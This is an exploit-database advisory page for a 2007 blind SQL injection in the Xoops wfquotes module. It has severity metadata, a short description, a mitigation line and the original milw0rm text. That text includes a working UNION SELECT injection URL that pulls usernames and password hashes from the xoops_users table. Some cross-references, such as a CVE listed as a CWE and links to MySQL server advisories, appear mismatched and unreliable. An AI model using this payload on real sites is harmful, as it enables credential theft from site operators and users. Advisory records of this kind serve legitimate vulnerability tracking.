header-logo
Suggest Exploit
vendor:
wfquotes module
by:
Unknown
7.5
CVSS
HIGH
Remote Blind SQL Injection
89
CWE
Product Name: wfquotes module
Affected Version From: v1.0
Affected Version To: v1.0
Patch Exists: NO
Related CWE: CVE-2007-2691
CPE: a:xoops:xoops:1.0
Metasploit: https://www.rapid7.com/db/vulnerabilities/freebsd-vid-bb4e9a44-dff2-11dd-a765-0030843d3802/https://www.rapid7.com/db/vulnerabilities/apple-osx-mysqlserver-cve-2007-2691/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-0894/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0768/https://www.rapid7.com/db/vulnerabilities/suse-cve-2007-2691/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0364/
Other Scripts:
Platforms Tested:
2007

Xoops wfquotes module v1.0 0 Remote Blind SQL Injection

The wfquotes module in Xoops v1.0 0 allows remote attackers to execute arbitrary SQL commands via the op parameter in the index.php script.

Mitigation:

Upgrade to a patched version of Xoops or apply a vendor-supplied patch.
Source

Exploit-DB raw data:

=================================================
+
+ Xoops wfquotes module v1.0 0 Remote Blind SQL Injection
+
=================================================
+
+ Bulan: Cyber-Ssecurity
+
=================================================
+
+ Exploit:
+ /modules/wfquotes/index.php?op=cat&c=1/**/UNION/**/SELECT/**/0,uname,pass,3,4,5/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*
+
=================================================

# milw0rm.com [2007-05-06]

Navigation

Suggest Exploit

Services By CQR